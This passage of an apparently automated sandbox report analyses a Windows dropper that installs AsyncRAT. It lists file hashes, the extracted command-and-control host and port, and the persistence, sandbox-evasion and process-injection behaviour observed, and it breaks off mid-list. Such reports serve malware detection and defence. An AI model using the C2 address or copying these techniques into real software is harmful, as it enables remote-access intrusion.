Analysis
-
max time kernel
105s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 08:24
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Dropper.exe
Resource
win10v2004-20240226-en
General
-
Target
Dropper.exe
-
Size
12KB
-
MD5
b11d9f89c1129428957175b7c55e8637
-
SHA1
6a1530364e3bf3c13a6500bdd313e1d8d4294301
-
SHA256
b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f
-
SHA512
e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba
-
SSDEEP
384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL
Malware Config
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1308 created 632 1308 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dropper.exeDropper.exe$77-aachost.exe$77-sdchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Dropper.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Dropper.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-aachost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-sdchost.exe -
Executes dropped EXE 10 IoCs
Processes:
$77-aachost.exe$77-sdchost.exe$77-penisballs.exe$77-aachost.exe$77-install.exe$77-scchost.exe$77-aachost.exe$77-sdchost.exe$77-penisballs.exe$77-scchost.exepid process 2316 $77-aachost.exe 4304 $77-sdchost.exe 1736 $77-penisballs.exe 2236 $77-aachost.exe 1396 $77-install.exe 1700 $77-scchost.exe 1372 $77-aachost.exe 4496 $77-sdchost.exe 1224 $77-penisballs.exe 5660 $77-scchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77-sdchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" $77-sdchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 18 IoCs
Processes:
$77-penisballs.exe$77-aachost.exepowershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exesvchost.exe$77-sdchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1308 set thread context of 1724 1308 powershell.EXE dllhost.exe -
Drops file in Windows directory 1 IoCs
Processes:
TiWorker.exedescription ioc process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exemousocoreworker.exedescription ioc process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4988 timeout.exe 5300 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
$77-penisballs.exemousocoreworker.exedllhost.exepowershell.EXEOfficeClickToRun.exe$77-aachost.exesvchost.exe$77-sdchost.execmd.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 22 Jun 2024 08:26:04 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02dlyduymzsmoetq svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719044763" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" $77-penisballs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2D91B293-3CCF-4F1C-8471-7C9DB36D76A1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit $77-penisballs.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000d7be53b27dc4da01 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hzvqoaalretqyt svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nnqrjpfthalfch\Provision Saturday, June 22, 2024 08:25:06 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAzMaTND0zrkSMSIDJLfiUBwAAAAACAAAAAAAQZgAAAAEAACAAAABYKSrm/Pf4YzU58W3mWk55MHR4DxIKqWChJb7vdCnLpgAAAAAOgAAAAAIAACAAAAAstyqLUoCqhOZiHC7L1WPzTxBl6q/0Bwm1ZJUk3fyBFyAAAAB+RyEH0mTzZKy/cKRVfGmN4WHdDruMYOZ886evrZikBUAAAADs8KntJHkVwnkX8Mkj0+9xDFP1Ly0MHgBe4+1Z8I/j0hrPJoiCSHzsONMxWC85exDPTSTt7qk2IgRpEQlL1hWZ" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hzvqoaalretqyt\Provision Saturday, June 22, 2024 08:25:05 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAzMaTND0zrkSMSIDJLfiUBwAAAAACAAAAAAAQZgAAAAEAACAAAABGaxqNl9HXOYmCvftovEmiuSrlfmALhNx7jdLLACkVYgAAAAAOgAAAAAIAACAAAACTpA6Tb+MN0xpPRRSmUcFBV217nKYMqc97mfc5TXFqfiAAAACuVMF2bWJ51gOrbOg/o8f8210CzEtqm5vHoAKnhyOUi0AAAACAvqttHccs8xIS5ipz2dANyYXeLeH6KM6p1gRqa0P5XdQI5YHOOI7dF3+BbGZp7K8cel/HERkohQJ9VJ3Ycgij" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nnqrjpfthalfch svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qqfktqqrppjgpz svchost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1804 schtasks.exe 5244 schtasks.exe 2668 schtasks.exe 4860 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
$77-aachost.exe$77-penisballs.exepowershell.EXEdllhost.exe$77-aachost.exe$77-penisballs.exepid process 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 2316 $77-aachost.exe 1736 $77-penisballs.exe 1736 $77-penisballs.exe 1736 $77-penisballs.exe 1736 $77-penisballs.exe 1308 powershell.EXE 1308 powershell.EXE 1308 powershell.EXE 1736 $77-penisballs.exe 1308 powershell.EXE 1724 dllhost.exe 1724 dllhost.exe 1724 dllhost.exe 1724 dllhost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1224 $77-penisballs.exe 1224 $77-penisballs.exe 1224 $77-penisballs.exe 1224 $77-penisballs.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe 1372 $77-aachost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exe$77-aachost.exepowershell.EXE$77-scchost.exedllhost.exe$77-sdchost.exe$77-penisballs.exe$77-aachost.exesvchost.exewmiprvse.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4304 $77-sdchost.exe Token: SeDebugPrivilege 1736 $77-penisballs.exe Token: SeDebugPrivilege 2316 $77-aachost.exe Token: SeDebugPrivilege 4304 $77-sdchost.exe Token: SeDebugPrivilege 1308 powershell.EXE Token: SeDebugPrivilege 1700 $77-scchost.exe Token: SeDebugPrivilege 1308 powershell.EXE Token: SeDebugPrivilege 1724 dllhost.exe Token: SeDebugPrivilege 4496 $77-sdchost.exe Token: SeDebugPrivilege 1224 $77-penisballs.exe Token: SeDebugPrivilege 1372 $77-aachost.exe Token: SeAssignPrimaryTokenPrivilege 2840 svchost.exe Token: SeIncreaseQuotaPrivilege 2840 svchost.exe Token: SeSecurityPrivilege 2840 svchost.exe Token: SeTakeOwnershipPrivilege 2840 svchost.exe Token: SeLoadDriverPrivilege 2840 svchost.exe Token: SeBackupPrivilege 2840 svchost.exe Token: SeRestorePrivilege 2840 svchost.exe Token: SeShutdownPrivilege 2840 svchost.exe Token: SeSystemEnvironmentPrivilege 2840 svchost.exe Token: SeUndockPrivilege 2840 svchost.exe Token: SeManageVolumePrivilege 2840 svchost.exe Token: 31 2840 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2840 svchost.exe Token: SeIncreaseQuotaPrivilege 2840 svchost.exe Token: SeSecurityPrivilege 2840 svchost.exe Token: SeTakeOwnershipPrivilege 2840 svchost.exe Token: SeLoadDriverPrivilege 2840 svchost.exe Token: SeSystemtimePrivilege 2840 svchost.exe Token: SeBackupPrivilege 2840 svchost.exe Token: SeRestorePrivilege 2840 svchost.exe Token: SeShutdownPrivilege 2840 svchost.exe Token: SeSystemEnvironmentPrivilege 2840 svchost.exe Token: SeUndockPrivilege 2840 svchost.exe Token: SeManageVolumePrivilege 2840 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2840 svchost.exe Token: SeIncreaseQuotaPrivilege 2840 svchost.exe Token: SeSecurityPrivilege 2840 svchost.exe Token: SeTakeOwnershipPrivilege 2840 svchost.exe Token: SeLoadDriverPrivilege 2840 svchost.exe Token: SeSystemtimePrivilege 2840 svchost.exe Token: SeBackupPrivilege 2840 svchost.exe Token: SeRestorePrivilege 2840 svchost.exe Token: SeShutdownPrivilege 2840 svchost.exe Token: SeSystemEnvironmentPrivilege 2840 svchost.exe Token: SeUndockPrivilege 2840 svchost.exe Token: SeManageVolumePrivilege 2840 svchost.exe Token: SeDebugPrivilege 2180 wmiprvse.exe Token: SeDebugPrivilege 4496 $77-sdchost.exe Token: SeAuditPrivilege 2076 svchost.exe Token: SeAuditPrivilege 2740 svchost.exe Token: SeAuditPrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2840 svchost.exe Token: SeIncreaseQuotaPrivilege 2840 svchost.exe Token: SeSecurityPrivilege 2840 svchost.exe Token: SeTakeOwnershipPrivilege 2840 svchost.exe Token: SeLoadDriverPrivilege 2840 svchost.exe Token: SeBackupPrivilege 2840 svchost.exe Token: SeRestorePrivilege 2840 svchost.exe Token: SeShutdownPrivilege 2840 svchost.exe Token: SeSystemEnvironmentPrivilege 2840 svchost.exe Token: SeUndockPrivilege 2840 svchost.exe Token: SeManageVolumePrivilege 2840 svchost.exe Token: 31 2840 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$77-penisballs.exe$77-penisballs.exepid process 1736 $77-penisballs.exe 1224 $77-penisballs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper.exeDropper.execmd.execmd.execmd.execmd.execmd.exe$77-aachost.execmd.execmd.exe$77-sdchost.execmd.execmd.exepowershell.EXEdescription pid process target process PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe PID 1964 wrote to memory of 3920 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3920 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3920 1964 Dropper.exe cmd.exe PID 3920 wrote to memory of 3916 3920 cmd.exe curl.exe PID 3920 wrote to memory of 3916 3920 cmd.exe curl.exe PID 3920 wrote to memory of 3916 3920 cmd.exe curl.exe PID 1964 wrote to memory of 2316 1964 Dropper.exe $77-aachost.exe PID 1964 wrote to memory of 2316 1964 Dropper.exe $77-aachost.exe PID 1964 wrote to memory of 3904 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3904 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3904 1964 Dropper.exe cmd.exe PID 3904 wrote to memory of 4932 3904 cmd.exe curl.exe PID 3904 wrote to memory of 4932 3904 cmd.exe curl.exe PID 3904 wrote to memory of 4932 3904 cmd.exe curl.exe PID 1964 wrote to memory of 4304 1964 Dropper.exe $77-sdchost.exe PID 1964 wrote to memory of 4304 1964 Dropper.exe $77-sdchost.exe PID 1964 wrote to memory of 4216 1964 Dropper.exe cmd.exe PID 